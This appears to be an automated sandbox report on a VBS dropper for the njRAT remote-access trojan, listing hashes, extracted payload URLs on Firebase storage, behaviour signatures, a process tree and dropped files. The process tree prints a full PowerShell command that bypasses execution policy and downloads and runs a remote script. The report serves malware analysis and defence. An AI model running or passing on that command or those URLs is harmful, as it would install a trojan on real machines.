Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
-
submitted
02-05-2024 13:34
General
-
Target
c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1.vbs
-
Size
271B
-
MD5
b9acaac18eee9b5cde0c6defbe2c1caa
-
SHA1
6f8cb34d61f9136e96345684846edf49dfa976bc
-
SHA256
c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1
-
SHA512
70c8b3742c98e1daf2c7fda40c992621c2250a9dac648c4798370697f5688e1883162079909dd245a33fc064a843a94f84c7399b99bae9b6418a47b3c5e75e12
Malware Config
Extracted
https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/SidM.jpg?alt=media&token=53ed6ff5-09e0-4464-a19c-f0e9d9c6cec8
Extracted
https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/Ssid.jpg?alt=media&token=10629c63-3c23-437a-9543-4f9dcee695bb
https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/Rnew.jpg?alt=media&token=d68ad7e3-80ed-4083-ad53-8af401c5b503
Extracted
njrat
0.7d
H
-
splitter
|'|'|
Signatures
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
Blocklisted process makes network request 2 IoCs
-
Drops startup file 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 31 IoCs
-
Suspicious use of WriteProcessMemory 18 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass iex ((New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/SidM.jpg?alt=media&token=53ed6ff5-09e0-4464-a19c-f0e9d9c6cec8'))2⤵
- Blocklisted process makes network request
- Drops startup file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\sCs.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\sCs.ps14⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD59553862ed1e00bd3e2b56370f296d36c
SHA1ee293e6e654d5d43a55183e56f27059100e2bd17
SHA25689c9a0fb1fae35b89bba64d15a913e333ab79977a89df34a812e3a735094d8fe
SHA5126a5593c6a933c20d52325c783ea5277ab47426f396250e14c530d25c7138770dde391c86562ce46482698e140ede84e59ea7dcc9304823eecc38ad568b34352c
-
C:\Users\Public\sCs.ps1Filesize
1KB
MD5e0e7ea9409eb39ae9d9e06ea8d2acd94
SHA13b8ab9de2c853a0238f3024eb8905ab81b8f634c
SHA25693b29bea09147a94220823e19c53a36c10ac8689bd196d73ae93e56c6acf3713
SHA51214cb12ce1637b7f2749179330328e6aa20871e6e5783f9e0d709ed2051241f0e4ee645c7d4629146c09c75f28470d4232b13aacc4193007c7b1d8644b25bd48f
-
C:\Users\Public\sCs.vbsFilesize
166B
MD5c3e1b2c797679d84c76dcdd5bb81db0d
SHA1f178c6888aa88ef7e940dd1b572ea9ac8c30c56c
SHA256cc9f01e9c6a3d717e775740b64106245324ecc9c77004f6c9b5d7d2e84cdf80b
SHA512be52acfd7294f31f7ee1c573711c915705f044cb762a6d5b6051f39f9774e7ef52287cfba5361e921ead9ca952e2c34f3a4210a4d8aa6badee78b1e7b713e22c
-
memory/1932-27-0x0000000002A10000-0x0000000002A1C000-memory.dmpFilesize
48KB
-
memory/2292-30-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2292-28-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2292-32-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2292-34-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2292-36-0x000000007EFDE000-0x000000007EFDF000-memory.dmpFilesize
4KB
-
memory/2292-37-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2292-38-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2292-39-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2976-16-0x000007FEF568E000-0x000007FEF568F000-memory.dmpFilesize
4KB
-
memory/2976-5-0x000000001B530000-0x000000001B812000-memory.dmpFilesize
2.9MB
-
memory/2976-6-0x0000000002290000-0x0000000002298000-memory.dmpFilesize
32KB
-
memory/2976-4-0x000007FEF568E000-0x000007FEF568F000-memory.dmpFilesize
4KB
-
memory/2976-7-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmpFilesize
9.6MB
-
memory/2976-20-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmpFilesize
9.6MB
-
memory/2976-8-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmpFilesize
9.6MB
-
memory/2976-9-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmpFilesize
9.6MB
-
memory/2976-15-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmpFilesize
9.6MB
-
memory/2976-11-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmpFilesize
9.6MB
-
memory/2976-10-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmpFilesize
9.6MB